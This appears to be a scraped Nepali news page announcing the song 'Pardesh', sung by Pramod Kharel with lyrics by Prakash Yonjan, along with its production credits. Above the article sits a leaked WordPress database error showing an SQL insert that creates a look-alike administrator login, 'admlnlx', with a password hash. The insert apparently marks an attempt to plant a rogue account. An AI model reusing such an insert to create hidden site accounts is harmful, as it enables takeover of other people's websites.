WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BM9gSXmgHuNzo1Aw6NY2zFU7HfN3OS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 18:11:55', '', 'admlnlx', 'admlnlx')
काठमाडौँ । प्रमोद खरेलको स्वरमा गीतकार प्रकाश योन्जनको ‘परदेश’ बोलको गीत बजारमा आएको छ । सिन्धुपाल्चोक निवासी योन्जनले आफ्नो सांगीतिक कोशेली पस्किने क्रममा ‘परदेशी’ बोलको गीत बजारमा ल्याएको हो ।
उनी आफ्नो गीत दर्शकले मन पराउनेमा विश्वस्त रहेको बताए । गीतकार योन्जन ञआमालाई चाहियो रे’ बोलको गीतबाट सांगीतिक क्षेत्रमा प्रवेश गरेका हुन ।
सार्वजानिक भएको ‘परदेश’ गीतलाई गीतकार प्रकाश योन्जनले लेखेका हुन भने, टिका बम्जनले संगीत गरेका हुन । पवन लामाले संगीत संयोजन गरेको गीतलाई गायक प्रमोद खरेलले गाएका हुन ।
उमेश गुरुङ्ले निर्देशन, कमला अमगाइले निर्माण, सम्भु चालिसेले भिडियोलाई छायांकन गरेका हुन । भिडियोमा महेश खड्का, उशा सुवेदी, लोकेश का एम भा र प्रशुना केसीको अभिनय समेटिएको छ ।